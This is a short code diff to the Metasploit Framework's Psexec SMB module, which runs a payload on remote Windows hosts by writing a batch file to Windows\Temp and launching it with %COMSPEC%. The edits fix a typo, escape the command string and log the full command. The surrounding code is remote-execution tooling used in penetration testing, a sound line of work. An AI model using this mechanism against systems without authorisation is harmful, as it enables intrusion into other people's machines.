@@ -26,7 +26,7 @@ module Exploit::Remote::SMB::Client::Psexec
       [
         OptString.new('SERVICE_NAME', [ false, 'The service name', nil]),
         OptString.new('SERVICE_DISPLAY_NAME', [ false, 'The service display name', nil]),
-        OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil])
+        OptString.new('SERVICE_DESCRIPTION', [false, "Service description to be used on target for pretty listing",nil])
       ], self.class)
 
     register_advanced_options(
@@ -223,7 +223,6 @@ module Exploit::Remote::SMB::Client::Psexec
     text = "\\Windows\\Temp\\#{Rex::Text.rand_text_alpha(8..16)}.txt"
     bat  = "\\Windows\\Temp\\#{Rex::Text.rand_text_alpha(8..16)}.bat"
     command = payload.encoded
-
     output = execute_command_with_output(text, bat, command, smbshare, datastore['RHOST'], delay: datastore['CMD::DELAY'])
 
     unless output.nil?
@@ -242,8 +241,9 @@ module Exploit::Remote::SMB::Client::Psexec
 
   def execute_command(text, bat, cmd)
     # Try and execute the provided command
+    cmd = Msf::Post::Windows.escape_cmd_literal(cmd, spaces: false)
     execute = "%COMSPEC% /C echo #{cmd} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start %COMSPEC% /C #{bat}"
-    vprint_status("Executing the command...")
+    vprint_status("Executing the command: #{execute}")
     begin
       return psexec(execute)
     rescue Rex::Proto::DCERPC::Exceptions::Error, Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError => e
